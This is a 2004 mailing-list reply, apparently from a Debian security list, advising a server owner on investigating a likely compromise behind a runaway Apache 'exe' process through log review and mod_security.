[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: apache / exe process taking 99 % cpu

On Wed, Sep 01, 2004 at 12:25:19AM +0200, Timo Veith wrote:
> I seems to be a php issue. I 
> searched through all php files that "include" or "fopen" something ... 
> whew there are way too many.
> Any ideas ?

  If you have pristine logfiles for apache you might want to look for
 suspicious parameters passed to requests recently.  Perhaps `ftp`
 or `wget` commands were used to upload the DOS / forking program
 upon your box?

  I'm sure a competant attacker would have either nuked the logs or
 used POST's for any control - but if you have some code running
 on that box which is using fopen, etc, the initial attempt might
 have been recorded.

  Failing that you could look at installing mod_security to record
 all future GET/POST arguments and payloads.  I found it fairly
 simple to backport to stable, and could probably dig out packages
 if that would be useful.

# The Debian Security Audit Project.

Reply to: